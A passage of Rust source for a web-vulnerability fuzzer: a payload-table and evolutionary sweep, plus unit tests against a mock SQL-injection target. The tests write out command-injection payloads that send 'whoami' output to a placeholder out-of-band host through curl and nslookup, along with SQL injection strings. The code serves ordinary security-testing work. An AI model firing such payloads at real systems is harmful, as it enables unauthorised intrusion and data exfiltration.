                .ok_or_else(|| "TableThenEvolutionary requires a preset with a payload table".to_string())?;
            let entries: Vec<String> = table.cases.iter()
                .map(|c| c.payload.clone())
                // Skip OOB payloads in the prefix when no collaborator is set.
                .filter(|p| oob_host.is_some() || !has_oob_placeholder(p))
                .collect();
            let signal_set = &self.preset.signal_set;
            let feedback = &*self.preset.feedback;
            let sweep_budget = self.budget.min(entries.len());
            let items: Vec<String> = entries.into_iter().take(sweep_budget).collect();

            // Concurrent, order-preserving prefix sweep (honours --concurrency
            // and --rate-limit); collects interesting payloads as extra seeds.
            run_sweep_concurrent(
                probe.clone(),
                items,
                |payload: &String| inject(payload),
                self.request_timeout,
                self.max_concurrent,
                self.probe_interval,
                |payload: String, req: Request, outcome: Option<ProbeResponse>| {
                    let Some(resp) = outcome else { return false };
                    let raw = signal_set.run(&payload, &baseline_resp, &resp);
                    let sigs = baseline_profile.filter(&raw);
                    let ctx = EvaluationContext {
                        payload: &payload, request: &req, baseline: &baseline_resp,
                        response: &resp, probe_error: None,
                        raw_signals: &raw, filtered_signals: &sigs,
                    };
                    if feedback.evaluate(&ctx).interesting {
                        extra_seeds.push(payload);
                    }
                    false
                },
            ).await;
        }

        // ── Evolutionary path (TableThenEvolutionary, Evolutionary) ──
        let sampler = WeightedSampler::new(
            self.preset.atoms,
            self.preset.chain,
            self.preset.placement,
            self.preset.length,
        );
        let havoc = HavocMutator::new(sampler.clone(), self.budget * 4);
        // Assemble seeds; skip OOB-templated seeds when no collaborator is set
        // (a `{{oob}}` seed can't fire, and havoc won't resynthesize the token).
        let mut seed_list: Vec<String> = self.preset.seeds.clone();
        seed_list.extend(self.additional_seeds.iter().cloned());
        seed_list.extend(extra_seeds.iter().cloned());
        let oob_skipped = if oob_host.is_none() {
            let before = seed_list.len();
            seed_list.retain(|p| !has_oob_placeholder(p));
            before - seed_list.len()
        } else { 0 };
        let corpus = SeedCorpus::from_seeds(&seed_list);

        let mut loop_ = EvolutionaryLoop::new(
            probe,
            corpus,
            sampler,
            havoc,
            self.preset.feedback,
        )
        .with_gen_ratio(self.preset.gen_ratio)
        .with_max_probes(self.budget)
        .with_signal_set(self.preset.signal_set)
        .with_request_timeout(self.request_timeout)
        .with_max_concurrent(self.max_concurrent);

        if let Some(interval) = self.probe_interval {
            loop_ = loop_.with_probe_interval(interval);
        }

        if self.stop_on_confirmation { loop_ = loop_.stop_on_first_hit(); }
        if let Some(s) = self.replay_seed { loop_ = loop_.with_seed(s); }

        // Run with pre-captured baseline — no duplicate request.
        let outcome = loop_.run_with_baseline(baseline_resp, inject).await?;

        let profile = &outcome.baseline_profile;
        let confidence = profile.confidence();

        let to_hit = |h: &EvolutionaryHit| {
            let source = match self.mode {
                FuzzMode::Table | FuzzMode::TableThenEvolutionary => {
                    if h.parent_idx < self.preset.table.as_ref().map(|t| t.len()).unwrap_or(0) {
                        PayloadSource::Table {
                            preset: self.preset.table.as_ref()
                                .map(|t| t.name.clone()).unwrap_or_default(),
                            index: h.parent_idx,
                        }
                    } else {
                        PayloadSource::Evolutionary
                    }
                }
                FuzzMode::InputsOnly => {
                    PayloadSource::UserInput { index: h.parent_idx }
                }
                FuzzMode::Evolutionary => PayloadSource::Evolutionary,
            };
            Hit {
                payload: h.payload.clone(),
                raw_score: h.score,
                confidence,
                adjusted_score: h.score as f32 * confidence,
                confirmed: h.confirmed && confidence > 0.3,
                signals: h.signals.iter().map(|s| s.kind().to_string()).collect(),
                suppressed: h.ambient.iter().map(|s| s.kind().to_string()).collect(),
                source,
                // Mutated payloads have no curated case metadata.
                severity: None,
                description: None,
                context: None,
            }
        };

        Ok(FuzzResult {
            confirmed: outcome.hits.iter().map(to_hit).filter(|h| h.confirmed).collect(),
            interesting: outcome.interesting.iter().map(to_hit).collect(),
            probes_sent: outcome.probes_sent,
            corpus_size: outcome.final_corpus_size,
            baseline: profile.summary(),
            oob_skipped,
        })
    }
}

#[cfg(test)]
mod tests {
    use super::*;
    use std::sync::Arc;

    #[test]
    fn oob_host_extraction() {
        assert_eq!(oob_host_of("http://x.oast.example"), "x.oast.example");
        assert_eq!(oob_host_of("https://x.oast.example:8080/path"), "x.oast.example");
        assert_eq!(oob_host_of("x.oast.example"), "x.oast.example");
        assert_eq!(oob_host_of("  x.oast.example/p  "), "x.oast.example");
    }

    #[test]
    fn oob_substitution_keeps_payload_scheme() {
        let host = Some("abc.oast.example".to_string());
        // Payload carries its own scheme; {{oob}} is only the host.
        assert_eq!(
            substitute_oob("curl http://{{oob}}/$(whoami)", &host),
            "curl http://abc.oast.example/$(whoami)"
        );
        // DNS context: no scheme injected.
        assert_eq!(
            substitute_oob("nslookup $(whoami).{{oob}}", &host),
            "nslookup $(whoami).abc.oast.example"
        );
        // nuclei alias resolves too.
        assert_eq!(substitute_oob("http://{{interactsh-url}}/x", &host), "http://abc.oast.example/x");
        // No host set → unchanged (caller skips these).
        assert_eq!(substitute_oob("http://{{oob}}/x", &None), "http://{{oob}}/x");
    }

    #[test]
    fn oob_placeholder_detection() {
        assert!(has_oob_placeholder("curl http://{{oob}}/x"));
        assert!(has_oob_placeholder("http://{{interactsh-url}}/x"));
        assert!(!has_oob_placeholder("' OR 1=1--"));
        // SSTI {{7*7}} must not be mistaken for an OOB token.
        assert!(!has_oob_placeholder("{{7*7}}"));
    }

    /// Mock probe that returns 500 + SQL error when payload contains ' OR.
    struct MockSqlTarget;
    #[async_trait]
    impl Probe for MockSqlTarget {
        async fn send(&self, req: &Request) -> Result<ProbeResponse, String> {
            let p = req.url.split("?q=").nth(1).unwrap_or("");
            if p.contains("' OR") || p.contains("' AND") || p.contains("UNION") {
                Ok(ProbeResponse { status: 500, body: format!("SQL error near '{p}'").into_bytes(), duration: Duration::from_millis(2) })
            } else {
                Ok(ProbeResponse { status: 200, body: b"ok".to_vec(), duration: Duration::from_millis(1) })
            }
        }
    }

    #[tokio::test]
    async fn table_mode_zero_divergence() {
        let probe = Arc::new(MockSqlTarget);

        async fn run_one(probe: Arc<MockSqlTarget>) -> FuzzResult {
            Fuzzer::new(probe)
                .sql_injection()
                .mode(FuzzMode::Table)
                .target("http://x/?q=", "GET")
                .inject_query("q")
                .budget(68)
                .replay_seed(42)
                .stop_on_first_hit()
                .run()
                .await
                .unwrap()
        }

        let r1 = run_one(probe.clone()).await;
        let r2 = run_one(probe.clone()).await;

        // Same number of hits
        assert_eq!(r1.confirmed.len(), r2.confirmed.len(), "confirmed count diverged");
        assert_eq!(r1.interesting.len(), r2.interesting.len(), "interesting count diverged");
        assert_eq!(r1.probes_sent, r2.probes_sent, "probes_sent diverged");

        // Same hits in same order
        for (i, (h1, h2)) in r1.confirmed.iter().zip(r2.confirmed.iter()).enumerate() {
            assert_eq!(h1.payload, h2.payload, "hit {i} payload diverged");
            assert_eq!(h1.raw_score, h2.raw_score, "hit {i} raw_score diverged");
            assert!((h1.confidence - h2.confidence).abs() < 0.001, "hit {i} confidence diverged");
            assert_eq!(h1.signals, h2.signals, "hit {i} signals diverged");
            // Provenance must be stable
            match (&h1.source, &h2.source) {
                (PayloadSource::Table { preset: p1, index: i1 }, PayloadSource::Table { preset: p2, index: i2 }) => {
                    assert_eq!(p1, p2, "hit {i} source preset diverged");
                    assert_eq!(i1, i2, "hit {i} source index diverged");
                }
                _ => panic!("hit {i} source type diverged"),
            }
        }

        // Interesting list also matches (includes unconfirmed)
        for (i, (h1, h2)) in r1.interesting.iter().zip(r2.interesting.iter()).enumerate() {
            assert_eq!(h1.payload, h2.payload, "interesting[{i}] payload diverged");
        }
    }

    /// Concurrency must not change table-sweep results. With content-addressed
    /// responses and no corpus feedback, a windowed sweep yields the *same*
    /// confirmed/interesting hits, in the same order, as a sequential run —
    /// proving the pipeline neither drops nor reorders results.
    #[tokio::test]
    async fn table_mode_concurrent_matches_sequential() {
        let probe = Arc::new(MockSqlTarget);

        async fn run_at(probe: Arc<MockSqlTarget>, conc: usize) -> FuzzResult {
            Fuzzer::new(probe)
                .sql_injection()
                .mode(FuzzMode::Table)
                .target("http://x/?q=", "GET")
                .inject_query("q")
                .budget(68)
                .concurrency(conc)
                .run()
                .await
                .unwrap()
        }

        let seq = run_at(probe.clone(), 1).await;
        let conc = run_at(probe.clone(), 8).await;

        assert_eq!(seq.probes_sent, conc.probes_sent, "probes_sent differs");
        assert_eq!(seq.confirmed.len(), conc.confirmed.len(), "confirmed count differs");
        assert!(!conc.confirmed.is_empty(), "expected some confirmed SQLi hits");
        for (i, (a, b)) in seq.confirmed.iter().zip(conc.confirmed.iter()).enumerate() {
            assert_eq!(a.payload, b.payload, "confirmed[{i}] payload differs (reordered/dropped)");
            assert_eq!(a.signals, b.signals, "confirmed[{i}] signals differ");
        }
        for (i, (a, b)) in seq.interesting.iter().zip(conc.interesting.iter()).enumerate() {
            assert_eq!(a.payload, b.payload, "interesting[{i}] payload differs");
        }
    }

    /// Determinism of the concurrent table sweep under real parallelism.
    #[tokio::test(flavor = "multi_thread", worker_threads = 4)]
    async fn table_mode_concurrent_deterministic_multithread() {
        let probe = Arc::new(MockSqlTarget);

        async fn confirmed_payloads(probe: Arc<MockSqlTarget>) -> Vec<String> {
            let r = Fuzzer::new(probe)
                .sql_injection()
                .mode(FuzzMode::Table)
                .target("http://x/?q=", "GET")
                .inject_query("q")
                .budget(68)
                .concurrency(8)
                .run()
                .await
                .unwrap();
            r.confirmed.into_iter().map(|h| h.payload).collect()
        }

        let a = confirmed_payloads(probe.clone()).await;
        let b = confirmed_payloads(probe.clone()).await;
        let c = confirmed_payloads(probe.clone()).await;
        assert_eq!(a, b, "multi-thread run 1 vs 2 diverged");
        assert_eq!(b, c, "multi-thread run 2 vs 3 diverged");
        assert!(!a.is_empty());
    }

    #[tokio::test]
    async fn table_mode_replay_matches_across_seeds() {
        let probe = Arc::new(MockSqlTarget);

        async fn run_one(probe: Arc<MockSqlTarget>, seed: u64) -> FuzzResult {
            Fuzzer::new(probe)
                .sql_injection()
                .mode(FuzzMode::Table)
                .target("http://x/?q=", "GET")
                .inject_query("q")
                .budget(30)
                .replay_seed(seed)
                .run()
                .await
                .unwrap()
        }

        let r1 = run_one(probe.clone(), 0).await;
        let r2 = run_one(probe.clone(), 0).await;
        assert_eq!(r1.confirmed.len(), r2.confirmed.len());

        let r3 = run_one(probe.clone(), 1).await;
        let r4 = run_one(probe.clone(), 1).await;
        assert_eq!(r3.confirmed.len(), r4.confirmed.len());
    }

    /// Table mode sends exact payloads in order — no mutation, no randomness.
    #[tokio::test]
    async fn table_mode_sends_exact_payloads_in_order() {
        use std::sync::Mutex;

        struct OrderRecordingProbe {
            seen: Mutex<Vec<String>>,
        }

        #[async_trait]
        impl Probe for OrderRecordingProbe {
            async fn send(&self, req: &Request) -> Result<ProbeResponse, String> {
                self.seen.lock().unwrap().push(req.body.clone());
                Ok(ProbeResponse { status: 200, body: b"ok".to_vec(), duration: Duration::from_millis(1) })
            }
        }

        let order_probe = Arc::new(OrderRecordingProbe { seen: Mutex::new(Vec::new()) });
        let order_clone = order_probe.clone();

        let result = Fuzzer::new(order_probe)
            .sql_injection()
            .mode(FuzzMode::Table)
            .target("http://x/", "POST")
            .inject_body_raw()
            .budget(5)
            .run()
            .await
            .unwrap();

        let seen = order_clone.seen.lock().unwrap();
        // Table mode must send the exact table entries in order, unmutated —
        // asserted against the live table so it survives corpus changes.
        let table = payloads::sqli_table().payloads();
        assert_eq!(seen.len(), 6, "should send baseline + exactly 5 payloads");
        assert_eq!(seen[0], "", "seen[0] is the empty-payload baseline");
        for i in 0..5 {
            assert_eq!(seen[i + 1], table[i], "payload {i} should be the exact table entry, unmutated");
        }

        assert_eq!(result.corpus_size, 0, "table mode should have no corpus");
        assert_eq!(result.probes_sent, 5, "probes_sent should match budget");
    }

    /// InputsOnly mode sends user-supplied payloads exactly, in order.
    #[tokio::test]
    async fn inputs_only_sends_exact_user_inputs() {
        use std::sync::Mutex;

        struct RecProbe { seen: Mutex<Vec<String>> }
        #[async_trait]
        impl Probe for RecProbe {
            async fn send(&self, req: &Request) -> Result<ProbeResponse, String> {
                self.seen.lock().unwrap().push(req.body.clone());
                Ok(ProbeResponse { status: 200, body: b"ok".to_vec(), duration: Duration::from_millis(1) })
            }
        }

        let probe = Arc::new(RecProbe { seen: Mutex::new(Vec::new()) });
        let probe_clone = probe.clone();

        let result = Fuzzer::new(probe)
            .sql_injection()
            .mode(FuzzMode::InputsOnly)
            .target("http://x/", "POST")
            .inject_body_raw()
            .seeds(["a", "b", "c", "d", "e"].iter().map(|s| s.to_string()))
            .budget(3)
            .run()
            .await
            .unwrap();

        let seen = probe_clone.seen.lock().unwrap();
        assert_eq!(seen.len(), 4, "baseline + budget 3 should send 3 payloads");
        assert_eq!(&seen[1..], &["a", "b", "c"], "user payloads sent in order");

        assert_eq!(result.corpus_size, 0, "inputs-only mode should have no corpus");
        assert_eq!(result.probes_sent, 3);
        // Provenance: all hits (none here) but interesting should have InputsOnly source
        // With status 200, nothing is interesting. Just verify runs clean.
    }
}
